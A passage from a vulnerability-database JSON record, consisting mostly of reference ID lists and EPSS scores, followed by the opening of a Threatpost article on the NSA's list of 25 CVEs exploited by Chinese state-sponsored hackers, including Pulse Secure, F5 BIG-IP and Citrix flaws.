"SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:9C375DB331E2434EE824100A45629096", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F05591B26EFD622E6C72E180A7A47154", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12320"]}, {"type": "seebug", "idList": ["SSV:90202", "SSV:96367", "SSV:97269", "SSV:97346"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0468-1", "OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1", "OPENSUSE-SU-2021:0677-1", "OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "symantec", "idList": ["SMNTC-107691", "SMNTC-108273", "SMNTC-110597", "SMNTC-111238", "SMNTC-111370", "SMNTC-111482", "SMNTC-1411"]}, {"type": "talos", "idList": ["TALOS-2020-0980"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2B14B5B996283DEF7D095E87B1128109", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:3ED0A7241D26DA2E055F95E6C0B4328B", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB", "TALOSBLOG:CC380ECFE738DDDFB3125AC0B32484C7", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6", "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:14032BD2586B50B37F3D79977D4C8F4F", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1AC8C94468BC3582621B1E56C40127CD", "THN:1AFD9B38CF83CBCCF34CEA589CD5838B", "THN:1B78DDF8BAADEE9CFC252FF9708EE0A6", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:23ADB89A5DA622FFE2242173C6438C19", "THN:24864C773B218FDD62A2BDB4E7E95B89", "THN:25E1C5E39F109FC80A69CCF02734A606", "THN:260FF74ECE80E5E87FD329A68B1420EE", "THN:28D18D871A6086136DFA7958D9C516E0", "THN:2AE638B06506778A5F779054ACB99CDC", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39B398DC5FBBEB4CA2C998AFB00B141E", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3B0CBDDCB6FCC241176B94BC03E008BA", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:44A32C71995BCA06A2F946B41E81310C", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4959B86491B72239BCAF1958D167D57D", "THN:4D48A331D9707E239D1C89EE592EE4D3", "THN:4D730B0E8FB7A8FA81D69770EF31795C", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:59AA6ADFEEB67D7E156CDF3579330697", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6A1A5F396F8A43A1DA67A07FF545680A", "THN:6C2DBDCB2BCAD28AA5B80EFC1EF9CDBF", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:7312C296214FCDE145DA02B933FB28F6", "THN:760436CE4EC7360DF1BD53E6B63CBE97", "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:82833AE00002BB0F41BEF5FD8972FAFB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8A48502265B6BF239E81FC688A0FF082", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:91D830EBDC372E772FBEC3C61F17F028", "THN:942BFBB34DF6A24E460572684F648005", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9B536B531E6948881A29BEC793495D1E", "THN:9DC026B1716712BE0EF2205D941A4D67", "THN:A2139F34F5915952064FC587D775913E", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "THN:B5B2AEA40FC2AB866E27855C79D1CDDA", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:CE51F3F4A94EFC268FD06200BF55BECD", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:D7DBE5ECBAF3E906ECA544B7E150594A", "THN:D839D3F3F73DC023B139A626D8C9CFE4", "THN:D9114576EA7861D9D8859B9EF23814E4", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:DBFCCEBE2752BA05D9181D55D3477666", "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E35C79A0DEB43A22940D0D123D5D1112", "THN:E43F2DE4F472015C54D6014AB3A0F7A1", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:E9A6FFB34DA1C49F512A7AE269951D50", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F1F7A2FB2164F9A7A60AB12A3C71076A", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F4C5F017FE55E40DF427E75D001F7D91", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:018A5896B52734EF63419DC7D2122C0A", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0B3F568CF532B4D11A2D561F09E1490F", "THREATPOST:0B96DF7B8D0B80F9F8340D753646049C", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:145B6B682222579D2623C124AE9DACD5", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:170045B7C0BA198775BD78B7D00C824E", "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20EAC8CBCC0B2A55B8195EB5B485B9D6", "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:363C332F7046A481C24C7172C55CF758", "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "THREATPOST:4474B9334E9322D775C57232CC4127EF", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F07A726C1A5FB6D0CE8EDF605517CA0", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:551363592C0C853E266999644B3579E4", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7719EB430C620858B2504EA847A9A096", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E6D2DBA11B2CCCE264B0982306FBEB1", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:817E3BC3FD6EC96207E5C2C419EF1EE8", "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8B35258B1121533D53A2A119EE7F1BF8", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96E775E045D4DF55CC1B9A3AA0C28F70", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BBF9233468A677A95C5E9D149089804E", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:D17226438122ABE49AFDDCE85A06760D", "THREATPOST:DB438BDD32A19C608E74D09992D53881", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F655BBBA2F55BA4D5A5093E56BB1E78E", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911"]}, {"type": "trellix", "idList": ["TRELLIX:1C43DDFF23D74094DC43986305E2F780", "TRELLIX:595642FD30B52118607424330C136C80", "TRELLIX:6373864BD1A0BAFE3430F237433C84A5", "TRELLIX:6A66742843755E787356176A644AAD06", "TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D9D2CB1A313A30DE730375258BD8DF6E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1", "USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2018-6789", "UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:1847", "VERACODE:22403", "VERACODE:25767", "VERACODE:27548"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-28427", "1337DAY-ID-28661", "1337DAY-ID-30269", "1337DAY-ID-30290", "1337DAY-ID-31403", "1337DAY-ID-32052", "1337DAY-ID-32053", "1337DAY-ID-32070", "1337DAY-ID-32437", "1337DAY-ID-32438", "1337DAY-ID-32439", "1337DAY-ID-32455", "1337DAY-ID-32569", "1337DAY-ID-32790", "1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33438", "1337DAY-ID-33565", "1337DAY-ID-33683", "1337DAY-ID-33725", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34095", "1337DAY-ID-34170", "1337DAY-ID-34184", "1337DAY-ID-34235", "1337DAY-ID-34468", "1337DAY-ID-34553", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-35085", "1337DAY-ID-35228", "1337DAY-ID-35274", "1337DAY-ID-35740", "1337DAY-ID-36350", "1337DAY-ID-36351", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195"]}]}, "score": {"value": 10.6, "vector": "NONE"}, "epss": [{"cve": "CVE-2012-0158", "epss": 0.97314, "percentile": 0.99769, "modified": "2023-05-01"}, {"cve": "CVE-2015-4852", "epss": 0.96313, "percentile": 0.9925, "modified": "2023-05-01"}, {"cve": "CVE-2017-6327", "epss": 0.49852, "percentile": 0.96959, "modified": "2023-05-02"}, {"cve": "CVE-2017-6328", "epss": 0.00161, "percentile": 0.51307, "modified": "2023-05-02"}, {"cve": "CVE-2018-4939", "epss": 0.97251, "percentile": 0.9972, "modified": "2023-05-02"}, {"cve": "CVE-2018-6789", "epss": 0.97394, "percentile": 0.99849, "modified": "2023-05-01"}, {"cve": "CVE-2019-0708", "epss": 0.97524, "percentile": 0.99977, "modified": "2023-05-02"}, {"cve": "CVE-2019-0803", "epss": 0.00476, "percentile": 0.72126, "modified": "2023-05-02"}, {"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-11580", "epss": 0.97471, "percentile": 0.99934, "modified": "2023-05-02"}, {"cve": "CVE-2019-16278", "epss": 0.97411, "percentile": 0.99866, "modified": "2023-05-02"}, {"cve": "CVE-2019-1652", "epss": 0.97448, "percentile": 0.99905, "modified": "2023-05-02"}, {"cve": "CVE-2019-1653", "epss": 0.97569, "percentile": 0.99997, "modified": "2023-05-02"}, {"cve": "CVE-2019-16920", "epss": 0.96236, "percentile": 0.99223, "modified": "2023-05-02"}, {"cve": "CVE-2019-18935", "epss": 0.8927, "percentile": 0.98183, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2019-3396", "epss": 0.97503, "percentile": 0.9996, "modified": "2023-05-02"}, {"cve": "CVE-2020-0601", "epss": 0.97284, "percentile": 0.99748, "modified": "2023-05-02"}, {"cve": "CVE-2020-0688", "epss": 0.97379, "percentile": 0.99829, "modified": "2023-05-02"}, {"cve": "CVE-2020-10189", "epss": 0.97136, "percentile": 0.99636, "modified": "2023-05-02"}, {"cve": "CVE-2020-1040", "epss": 0.00315, "percentile": 0.65774, "modified": "2023-05-01"}, {"cve": "CVE-2020-1350", "epss": 0.92976, "percentile": 0.98517, "modified": "2023-05-01"}, {"cve": "CVE-2020-1472", "epss": 0.97362, "percentile": 0.99808, "modified": "2023-05-01"}, {"cve": "CVE-2020-15505", "epss": 0.97524, "percentile": 0.99977, "modified": "2023-05-01"}, {"cve": "CVE-2020-2555", "epss": 0.95786, "percentile": 0.99083, "modified": "2023-05-02"}, {"cve": "CVE-2020-3118", "epss": 0.00219, "percentile": 0.58361, "modified": "2023-05-02"}, {"cve": "CVE-2020-5902", "epss": 0.97562, "percentile": 0.99995, "modified": "2023-05-01"}, {"cve": "CVE-2020-6789", "epss": 0.00065, "percentile": 0.26588, "modified": "2023-05-01"}, {"cve": "CVE-2020-8193", "epss": 0.97456, "percentile": 0.99915, "modified": "2023-05-01"}, {"cve": "CVE-2020-8195", "epss": 0.94896, "percentile": 0.98842, "modified": "2023-05-01"}, {"cve": "CVE-2020-8196", "epss": 0.00183, "percentile": 0.54033, "modified": "2023-05-01"}, {"cve": "CVE-2020-8515", "epss": 0.97183, "percentile": 0.99668, "modified": "2023-05-02"}], "vulnersScore": 10.6}, "_state": {"dependencies": 1695454225, "score": 1695454452, "epss": 0}, "_internal": {"score_hash": "537c7afb00eac378f8b11fc67364b535"}}

{"threatpost": [{"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and 